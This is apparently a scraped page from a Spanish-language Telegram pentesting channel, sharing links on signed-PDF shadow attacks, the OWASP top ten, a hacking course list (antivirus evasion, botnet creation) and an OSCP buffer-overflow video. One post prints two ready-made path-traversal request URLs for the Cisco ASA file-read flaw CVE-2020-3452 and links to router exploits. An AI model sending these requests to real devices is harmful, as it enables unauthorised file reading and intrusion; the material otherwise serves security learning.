Comunidad Pen7esting
3.58K subscribers
510 photos
40 videos
142 files
5.08K links
Download Telegram
Shadow Attacks:
Hiding and Replacing Content in Signed PDFs (CVE-2020-9592/9596)
https://pdf-insecurity.org
Report and Exploits:
https://pdf-insecurity.org/signature-shadow/downloads.html
Attacks on PDF Signatures:
https://pdf-insecurity.org/signature/signature.html
📃 "WAF: cortafuegos que evitan incendios en tu web" 7/6/18 https://www.incibe.es/protege-tu-empresa/blog/waf-cortafuegos-evitan-incendios-tu-web

Los riesgos más críticos según owasp

1️⃣ Inyección
2️⃣ Pérdida de autenticación
3️⃣ Exposición de datos sensibles
4️⃣ XEE o Entidades externas de XML
5️⃣ Pérdida del control de accesos
6️⃣ Configuración de seguridad incorrecta
7️⃣ XSS o secuencia de comandos en sitios cruzados
8️⃣ Deserialización insegura
9️⃣ Componentes con vulnerabilidades conocidas
🔟 Registro y monitoreo insuficientes
📃 "La mitad de las aplicaciones de banca móvil son vulnerables" Positive Technologies https://blog.segu-info.com.ar/2020/06/la-mitad-de-las-aplicaciones-de-banca.html
Wireshark Cheat Sheet
368.3 KB
Wireshark Cheat Sheet
Backtrackacademy - Aprende Pentesting Avanzado

—---------------------------------------------------------------------------------------—

Una sección creada por el equipo de backtrackacademy llamada #HackOfTheWeek ven y aprende técnicas de hacking avanzado.



1. Análisis forense Recuperar archivos borrados
2. Post – Explotacion Redirrecionando paginas web
3. Instalando, configurando y ejecutando el emulador de Android en Linux
4. Configurando nuestra camara web como un medio de video
5. Evasión de antivirus mediante la modificación de firmas
6. Pentest a Windows 7, cuando los exploits y la ingeniería social
7. Pentesting sobre aplicaciones Web
8. Programando en ensamblador y uso del debugger gdb
9. Creando nuestro propio sniffer con scapy
10. Creando una botnet y Analisis de malware
11. Creando Access Point falsos
12. Bypass Windows
13. Explotando la vulnerabilidad 'Shellshock'
14. Ingeniería inversa en Linux
15. Explotando el heartbleed
16. ¿Cómo vulnerar Windows 8 completamente protegido?
17. Filtrando Exploits en Metasploit
18. Bit setuid

—---------------------------------------------------------------------------------------—

Descarga:

https://mega.nz/#!qBQ2BApY!Hd2NpSjUTrG2tWIJ9jsSvMp0PB5TwAnNmeH5YXCsy8I
Network Hardware Vulnerabilities:
1. CVE-2020-3452:
Unauthenticated file read in Cisco ASA & Cisco Firepower
Poc1:
For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
PoC2:
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
2. CVE-2020-15498/15499:
ASUS RT-AC1900P Router Vulnerability
https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=27440
3. CVE-2020-9376/9377:
D-Link DIR-610 - RCE via the cmd parameter to command.php/Information Disclosure
PoC:
https://github.com/renatoalencar/dlink-dir610-exploits
4. DLink Leaks Firmware Encryption Key (PoC)
https://nstarke.github.io/0036-decrypting-dlink-proprietary-firmware-images.html
En esta ocasión, os enseño a resolver el Buffer Overflow que cae en la certificación OSCP. Este ejercicio es uno de los más temidos por muchos, pero hay que considerar que si lo controlas... tienes 25 puntos regalados en el examen.

Os enseñaré trucos y tips para agilizar la creación de vuestro exploit, comentando todos los casos que os pueden tocar y las complicaciones que podéis tener, mostrando cómo solucionar cada uno de estos problemas. La idea del vídeo es que desde que lo terminéis, os sintáis seguros para abordar este ejercicio y empecéis con buen pie el examen.

https://www.youtube.com/watch?v=sdZ8aE7yxMk
📃 "La mitad de las aplicaciones de banca móvil son vulnerables" Positive Technologies https://blog.segu-info.com.ar/2020/06/la-mitad-de-las-aplicaciones-de-banca.html